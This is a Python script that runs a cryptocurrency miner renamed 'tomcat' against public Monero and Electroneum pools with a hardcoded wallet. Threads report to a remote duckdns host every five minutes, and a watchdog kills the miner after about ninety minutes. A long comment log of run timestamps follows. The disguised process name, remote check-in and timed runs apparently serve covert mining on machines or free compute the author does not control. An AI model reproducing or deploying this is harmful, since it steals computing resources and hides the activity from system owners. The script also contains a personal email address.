import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:16:07.233519
#2018-02-17 17:05:08.818457
#2018-02-17 18:53:06.086815
#2018-02-17 20:41:03.989414
#2018-02-17 22:27:07.571942
#2018-02-18 00:10:01.528959
#2018-02-18 02:02:03.771001
#2018-02-18 03:48:07.194173
#2018-02-18 05:36:01.514762
#2018-02-18 07:29:05.279480
#2018-02-18 09:17:01.726637
#2018-02-18 11:03:01.639153
#2018-02-18 12:49:05.902889
#2018-02-18 14:37:01.426801
#2018-02-18 16:26:03.852030
#2018-02-18 18:14:01.494379
#2018-02-18 20:00:08.951044
#2018-02-18 21:47:07.400844
#2018-02-18 23:35:01.634907
#2018-02-19 01:21:05.123475
#2018-02-19 03:09:03.612812
#2018-02-19 04:54:05.066043
#2018-02-19 06:39:01.814785
#2018-02-19 08:28:07.381434
#2018-02-19 10:17:05.276028
#2018-02-19 12:05:05.786084
#2018-02-19 13:52:09.729012
#2018-02-19 15:41:01.663842
#2018-02-19 17:27:05.079461
#2018-02-19 19:14:08.307215
#2018-02-19 21:03:05.670266
#2018-02-19 22:49:01.728026
#2018-02-20 00:32:06.350666
#2018-02-20 02:21:01.475892
#2018-02-20 04:11:05.115351
#2018-02-20 05:54:01.367974
#2018-02-20 07:39:05.513040
#2018-02-20 09:23:07.965211
#2018-02-20 11:06:09.442328
#2018-02-20 12:54:10.279559
#2018-02-20 14:40:01.446294
#2018-02-20 16:24:07.557248
#2018-02-20 18:12:09.979409
#2018-02-20 20:05:06.367460
#2018-02-20 21:52:05.671350
#2018-02-20 23:33:04.680273
#2018-02-21 01:18:04.235546
#2018-02-21 03:07:01.226770
#2018-02-21 04:53:03.751984
#2018-02-21 06:41:06.996641
#2018-02-21 08:27:05.436406
#2018-02-21 10:12:09.697116
#2018-02-21 12:02:07.368070
#2018-02-21 13:50:09.845473
#2018-02-21 15:36:01.672676
#2018-02-21 17:26:09.173742
#2018-02-21 19:14:09.672137
#2018-02-21 21:02:06.564813
#2018-02-21 22:48:05.248919
#2018-02-22 00:38:01.519057
#2018-02-22 02:25:06.697580
#2018-02-22 04:12:06.786724
#2018-02-22 05:57:08.336014
#2018-02-22 07:45:01.732564
#2018-02-22 09:34:03.913369
#2018-02-22 11:18:03.095622
#2018-02-22 13:04:01.821405
#2018-02-22 14:51:08.341574
#2018-02-22 16:38:11.127955
#2018-02-22 18:23:05.212189
#2018-02-22 20:17:06.958950
#2018-02-22 22:03:05.866727
#2018-02-22 23:50:07.394745
#2018-02-23 01:37:02.262947
#2018-02-23 03:23:04.358277
#2018-02-23 05:09:04.190158
#2018-02-23 06:54:01.529041
#2018-02-23 08:38:04.132263
#2018-02-23 10:52:08.026064
#2018-02-23 12:48:08.927403
#2018-02-23 14:32:05.709213
#2018-02-23 16:21:08.569021
#2018-02-23 18:07:02.131144
#2018-02-23 19:52:02.250732
#2018-02-23 21:36:07.632866
#2018-02-23 23:23:06.234615
#2018-02-24 01:16:01.693105
#2018-02-24 03:06:06.238988
#2018-02-24 04:52:05.052365
#2018-02-24 06:37:07.061828
#2018-02-24 08:27:01.299939
#2018-02-24 10:13:05.429238
#2018-02-24 12:08:05.227349
#2018-02-24 13:55:08.026940
#2018-02-24 15:47:04.133366
#2018-02-24 17:39:01.548952
#2018-02-24 19:25:08.489400
#2018-02-24 22:23:06.979555
#2018-02-25 02:34:03.673268
#2018-02-25 06:15:04.848664
#2018-02-25 11:40:05.446556